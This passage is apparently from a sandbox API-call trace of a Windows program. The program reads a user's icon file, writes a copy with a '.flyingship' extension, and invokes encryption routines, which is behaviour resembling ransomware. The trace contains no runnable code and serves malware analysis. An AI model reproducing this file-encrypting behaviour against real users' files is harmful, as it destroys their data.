(HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0174.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0174.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0174.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0174.121] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0174.121] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0174.121] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0174.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0174.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0174.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa5f008 [0174.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0174.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0174.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0174.123] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.123] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0174.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0174.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0174.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0174.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0174.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0174.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0174.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0174.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0174.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0174.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0174.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0174.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0174.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0174.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0174.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0174.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0174.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0174.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0174.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0174.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0174.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0174.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0174.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0174.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0174.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0174.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0174.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0174.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0174.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0174.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0174.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0174.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.flyingship.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.flyingship.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0174.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0174.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0174.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0174.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0174.130] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0174.130] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x74e6, lpOverlapped=0x0) returned 1 [0175.154] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0175.155] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0175.155] TranslateMessage (lpMsg=0x87f36c) returned 0 [0175.155] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0175.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0175.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.155] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0175.156] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0175.156] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0175.156] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0175.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0175.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0175.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x74e6) returned 0xa7f018 [0175.157] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.157] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.157] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0175.157] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0175.157] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0175.157] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0175.158] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.158] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0175.158] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0175.159] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0175.159] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.159] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0175.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0175.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0175.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 